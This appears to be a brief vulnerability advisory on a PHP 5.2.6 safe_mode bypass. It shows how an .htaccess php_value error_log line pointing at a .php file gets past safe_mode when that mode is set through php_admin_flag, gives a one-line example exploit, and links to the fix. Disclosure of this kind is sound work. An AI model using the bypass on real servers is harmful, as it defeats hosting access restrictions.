2517

PHP 5.2.6 (error_log) safe_mode bypass

PHP 5.2.6 (error_log) safe_mode bypass ]Affected Software: PHP 5.2.6Vendor: http://www.php.net- --- 0.Description ---PHP is an HTML-embedded scripting language. Much of its syntax is borrowedfrom C, Java and Perl with a couple of unique PHP-specific features thrownin. The goal of the language is to allow web developers to writedynamically generated pages quickly.error_logThey allow you to define your own error handling rules, as well as modifythe way the errors can be logged. This allows you to change and enhanceerror reporting to suit your needs.- --- 0. error_log const. bypassed by php_admin_flag ---The main problem is between using safe_mode in global modephp.ini­:safe_mode = Onand declaring via php_admin_flag...php_admin_flag safe_mode OnWhen we create some php script in /www/ and try call to:ini_set("error_log", "/hack/");or in /www/.htaccessphp_value error_log "/hack/bleh.php"Result:Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid is80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. Thescript whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in/www/phpinfo.php on line 4It was for safe_mode declared in php.ini. But if we usephp_admin_flag safe_mode Onin httpd.conf, we will get onlyWarning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect. Thescript whose uid is 80 is not allowed to access /hack/ owned by uid 1001 in/www/phpinfo.php on line 4syntax in .htaccessphp_value error_log "/hack/blehx.php"is allowed and bypass safe_mode.example exploit:error_log("", 0);- --- 2. How to fix ---Fixed in CVShttp://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markupNote:Do not use safe_mode as a main safety.
0